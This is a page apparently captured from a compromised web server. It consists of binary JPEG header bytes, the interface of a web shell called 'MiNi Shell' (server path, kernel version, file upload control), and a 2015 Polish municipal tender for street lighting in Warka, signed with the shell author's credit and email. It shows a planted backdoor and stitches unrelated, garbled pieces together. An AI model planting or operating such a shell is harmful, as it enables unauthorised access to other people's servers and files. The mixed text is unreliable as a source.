JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150515/114464-N-2015.html

<p class="kh_header"><b>Warka: Zadanie 1 - Budowa oświetlenia ulicznego we wsi Grażyna - etap VI
 Zadanie 2 - Budowa oświetlenia ulicznego w Nowej Wsi - etap III</b><br>
<b>Numer ogłoszenia: 114464 - 2015; data zamieszczenia: 15.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Warka , Plac St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, tel. 048 665 12 00, faks 048 665 12 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1 - Budowa oświetlenia ulicznego we wsi Grażyna - etap VI
 Zadanie 2 - Budowa oświetlenia ulicznego w Nowej Wsi - etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE 1  
Budowa oświetlenia ulicznego we wsi Grażyna - etap VI
Przedmiotem zamówienia jest budowa odcinka linii napowietrznej niskiego napięcia oświetlenia
ulicznego we wsi Grażyna , gmina Warka  na działce nr ew. 175, obręb Grażyna,  w pasie drogi
powiatowej zgodnie z  projektem budowlanym, warunkami technicznymi zasilania wydanymi przez
Rejonowy Zakład Energetyczny w Grójcu  oraz obowiązującymi przepisami i normami. Zgodnie
 z warunkami technicznymi RZE projekt przewiduje budowę  linii napowietrznej  zasilanej ze stacji
transformatorowej Ostrołęka Nowa I, nr 468/TN-C.
W etapie VI, objętym zamówieniem, zostanie wykonana linia oświetleniowa obejmująca dobudowę trzech  stanowisk (obwód 2, numeracja zgodna z projektem w nawiązaniu 
do etapu V,) tj.:
- słup nr 2, żelbetowy ŻN- 10, oprawa OUS 150 W,  na wysięgniku 1-ramiennym - przy
    działce nr ew.52, 
- słup nr 3,  żelbetowy ŻN- 10, oprawa OUS 150 W, na wysięgniku 1-ramiennym - przy
   działce nr ew. 49/2, 
- słup nr 4, żelbetowy ŻN- 10, oprawa OUS 150 W, na wysięgniku 1-ramiennym - przy
   działce nr ew. 47/1, 
  począwszy od słupa nr 1 przy działce nr ew.54 wybudowanego w etapie V.
ZADANIE 2 
Budowa oświetlenia ulicznego w Nowej Wsi - etap III
Przedmiotem zamówienia jest budowa odcinka linii kablowej niskiego napięcia oświetlenia ulicznego w miejscowości  Nowa Wieś, gmina Warka na działce nr ew. 143 w pasie drogi wojewódzkiej nr 730 oraz na działce nr ew. 163 w pasie drogi powiatowej zgodnie z  projektem budowlanym, warunkami technicznymi zasilania wydanymi przez Rejonowy Zakład Energetyczny w Grójcu  oraz obowiązującymi przepisami i normami. 
 W etapie III, objętym niniejszym zamówieniem, zostanie wykonany odcinek linii oświetlenia obejmujący dobudowę dwóch stanowisk w pasie drogi wojewódzkiej oraz jedno stanowisko w pasie drogi powiatowej (numeracja zgodna z projektem) tj.:
- słup nr 14, stalowy  8 m z wysięgnikiem 1- ramiennym i oprawa oświetlenia ulicznego OUS
 70W - przy działce nr ew. 190
- słup nr 15, stalowy  8 m z wysięgnikiem 1- ramiennym i oprawa oświetlenia ulicznego OUS
 70W - przy działce nr ew. 190
- słup nr 15/1, stalowy  8 m z wysięgnikiem 1- ramiennym i oprawa oświetlenia ulicznego OUS
 70W - przy działce nr ew. 190
Począwszy od słupa nr 13 wybudowanego w II etapie
Ponadto w koszcie oferty należy przewidzieć cięcie pielęgnacyjne drzewa przy słupie 15 1.

Dla zadania 1 i zadania 2:
Roboty powinny być wykonane zgodnie z obowiązującym prawem w szczególności: 
Warunkami Technicznymi Wykonawstwa i Odbioru Robót Budowlanych, Prawem 
Budowlanym, Prawem ochrony środowiska, Prawem o ruchu drogowym, Ustawą o drogach 
publicznych, ustawą o odpadach, ustawą o badaniach i certyfikatach, Prawem zamówień 
publicznych i aktami wykonawczymi do w/w oraz wymaganiami Zamawiającego zawartymi 
w SIWZ i wiedzą techniczną.
W ramach zadania Wykonawca zobowiązany będzie do dokonania pierwszego uruchomienia na 
własny koszt. Ponadto Wykonawca na swój koszt i własnym staraniem oznakuje zabudowane 
słupy, numerem wg numeracji przyjętej w projekcie. Sposób graficznego oznakowania należy
 uzgodnić z Zamawiającym przed wykonaniem.
W ramach zadania do obowiązków Wykonawcy należało będzie uzupełnienie koniecznych wpisów 
w książkach obiektów budowlanych na poszczególne zadania.



Po zakończeniu zadania Wykonawca sporządzi własnym staraniem i na własny koszt wykaz
zrealizowanych prac (rozliczenie rzeczowe), w tym wykaz długości wybudowanych sieci, ilość  lamp itp. Powyższe materiały dołączy do materiałów odbiorowych. Wykaz winien być podpisany  przez uprawnionego geodetę, kierownika budowy i inspektora nadzoru inwestorskiego.
       Zamawiający ustala ryczałtowy system wynagradzania. Wykonawca powinien 
przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę oferty. 
Podstawę do określenia całkowitej ryczałtowej ceny stanowi zakres robót budowlanych 
określony w dokumentacji projektowej oraz zakres prac w SIWZ, realizowanych zgodnie ze 
sztuką budowlaną i przepisami ustawy Prawo budowlane oraz Specyfikacjami Technicznymi 
Wykonania i Odbioru Robót.
	Wykonawca winien sporządzić kosztorys ofertowy  na podstawie załączonego przedmiaru 
robót. Przedmiar ma charakter informacyjno-pomocniczy. Załączony przez oferenta kosztorys 
ofertowy ze wzglądu na ryczałtowy sposób wynagrodzenia będzie miał również charakter 
informacyjno-pomocniczy. Wyłonionego w przetargu Wykonawcę obowiązuje wykonanie 
zamówienia zgodnie z dokumentacją projektową, SIWZ , Stwor  i wiedzą techniczną.
Zamawiający nie będzie badał zgodności podstaw wyceny, ani ilości robót w złożonych przez 
oferentów kosztorysach ofertowych.
Cena określona w ofercie musi zawierać wszystkie koszty związane z realizacją wg 
dokumentacji projektowej, SIWZ, STWiOR jak również pominięte w dokumentacji 
projektowej a niezbędne do wykonania zadania, wraz z wszelkimi kosztami towarzyszącymi jak ubezpieczenie budowy, obsługa geodezyjna i inwentaryzacja powykonawcza , czasowa 
organizacja ruchu, zajęcie pasa drogowego, odbiory pasa drogowego, media, pierwsze 
uruchomienie itp. 
Wszelkie odstępstwa od dokumentacji projektowej w trakcie realizacji robót muszą być 
uzgadniane z Zamawiającym i Projektantem przed ich wykonaniem. 
Urządzenia równoważne - jeśli gdziekolwiek w SIWZ przedmiot zamówienia określony został 
przez wskazanie znaków towarowych lub pochodzenie materiałów, to Zamawiający 
dopuszcza możliwość zastosowania urządzeń/materiałów równoważnych w stosunku
do zaprojektowanych z zachowaniem tych samych standardów technicznych, technologicznych, 
jakościowych i wizualnych.
Przez pojęcie urządzeń/materiałów równoważnych należy rozumieć urządzenia/materiały 
gwarantujące realizację robót zgodnie z wydanym pozwoleniem na budowę oraz zapewniające 
uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji 
projektowej, specyfikacjach technicznych wykonania i odbioru robót oraz w przedmiarach robót.
Wykaz zastosowanych i przyjętych przez Wykonawcę do wyceny materiałów lub urządzeń 
równoważnych musi zostać załączony do oferty. Koniecznym jest podanie nazwy 
producenta, precyzyjnego i jednoznacznego typu urządzenia  oraz załączenie niezbędnych 
dokumentów takich jak: deklaracja zgodności producenta/ aprobata techniczna, karta 
katalogowa producenta zawierająca wszystkie parametry techniczno-eksploatacyjne 
ujęte w dokumentacji projektowej.
Zgodnie z zapisami art. 30 ust. 5 ustawy Prawo zamówień Publicznych Wykonawca, który 
powołuje się na rozwiązania równoważne opisane przez zamawiającego, jest obowiązany wykazać,
że oferowane przez niego roboty budowlane i związane z tym usługi i dostawy spełniają wymagania
określone przez zamawiającego.
W związku z powyższym w celu oceny technicznej wszyscy oferenci powołujący się na rozwiązania
równoważne są zobowiązani załączyć do oferty karty katalogowe.
Zamawiający nie wyraża zgody, by proponowane w ofercie rozwiązania równoważne były 
prototypami. Wymogiem bezwzględnym jest, by były to urządzenia sprawdzone. 


Wykonawca winien udokumentować, iż zaproponowane urządzenia równoważne pracują na innych 
zrealizowanych obiektach przez okres nie krótszy niż 2 lata ( na dowód pracy urządzeń 
równoważnych należy załączyć np. referencje, protokóły odbioru, faktury, itp. potwierdzone za 
zgodność z oryginałem, potwierdzające datę uruchomienia oraz dokument potwierdzający należytą
 ich pracę w tym okresie - referencje, opinie itp. )  
Szczegółowy opis obowiązków Wykonawcy zawarty jest we wzorze umowy a zakres prac 
w dokumentacji projektowej.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust.1 pkt. 6 ustawy Pzp do 50% wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.31.61.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w w/w zakresie nie precyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie doświadczenia zawodowego w zakresie robót 
   budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym
 przedmiot zamówienia. 
  Wykonawca przedstawi dokumenty świadczące o tym, że w ciągu ostatnich 5 lat przed upływem
   terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
wykonał    co najmniej dwie roboty budowlane polegające na budowie linii lub odcinka linii energetycznej oświetlenia ulicznego o wartości powyżej 10 000,00 zł brutto każda. 
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonych dokumentów wymaganych i określonych w p. punkcie III.4.1)  - wg kryterium: spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w w/w zakresie nie precyzuje warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami odpowiedzialnymi za wykonanie zamówienia lub
   przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób
   wykwalifikowanych, zdolnych do wykonania zamówienia, posiadających uprawnienia
   budowlane, upoważniające w świetle obowiązujących przepisów do kierowania 
   i nadzorowania robót w zakresie zamówienia. 

Wymagana osoba to: 
Kierownik Robót Elektrycznych - posiadający następujące kwalifikacje: 
	co najmniej 2 lata doświadczenia zawodowego na stanowisku Kierownika Robót Elektrycznych lub kierownika budowy, liczone od dnia uzyskania uprawnień,
	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
	aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę
	wykształcenie wyższe 
Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonych, wymaganych dokumentów, określonych w punkcie III.4.1)- wg kryterium spełnia,  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w w/w zakresie nie precyzuje warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca przedstawi dokumenty świadczące o tym, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał    co najmniej dwie roboty budowlane polegające na budowie linii lub odcinka linii energetycznej oświetlenia ulicznego o wartości powyżej 10 000,00 zł brutto każda.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Upoważnienie potwierdzające uprawnienie osób podpisujących ofertę (pełnomocnictwo), 
      o ile nie wynika ono z przepisów prawa lub innych dokumentów rejestrowych w 
      oryginale lub kopii poświadczonej przez notariusza.
2)	Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22. ust.1 ustawy Pzp - wg załącznika nr 2 do SIWZ
3)	Formularz oferty wg wzoru - załącznik nr 1 do SIWZ.
4)	W przypadku składania oferty przez konsorcjum, niezbędne będzie złożenie pełnomocnictwa w oryginale lub kopii poświadczonej przez notariusza.
5)	Kosztorysy ofertowe sporządzone na podstawie załączonych przedmiarów robót -odpowiednio wg załączników nr 8A, 8B
6)	Wykaz urządzeń/materiałów równoważnych wg załącznika nr 9 - w przypadku ich zastosowania.
7)	Dokumenty potwierdzające, że urządzenia równoważne pracują na innych obiektach przez okres nie krótszy niż 2 lata potwierdzone przez Wykonawcę za zgodność z oryginałem               (np.: referencje, protokoły odbioru końcowego itp.) - w przypadku zastosowania urządzeń równoważnych w złożonej ofercie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w   przypadkach określonych ustawą Pzp oraz zapisami w niniejszej SIWZ i w jej  załącznikach w następujących przypadkach: 
a)	  z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
b)	 z powodu wystąpienia dodatkowych, a nie możliwych do przewidzenia przed zawarciem umowy przez doświadczonego Wykonawcę, robót,
c)	  z powodu wystąpienia warunków atmosferycznych uniemożliwiających wykonanie robót - fakt ten musi mieć odzwierciedlenie w dzienniku budowy lub protokole konieczności i musi być potwierdzony przez inspektora nadzoru,
d)	  z powodu okoliczności siły wyższej, np. wystąpieniem zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
e)	  z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
f)	  z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych 
polegających na niezgodności dokumentacji z przepisami prawa,  
          Warunki dokonywania zmian: 
         -  inicjowanie zmian na wniosek wykonawcy lub zamawiającego, 
         - uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
         -  forma pisemna pod rygorem nieważności w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warka.pl zp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Warce, pl. St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, do upływu terminu składania ofert - informacja w BIURZE OBSŁUGI..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2015 godzina 12:00, miejsce: Urząd Miejski w Warce, pl. Stefana Czarnieckiego 1, 05-660 Warka w BIURZE OBSŁUGI..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com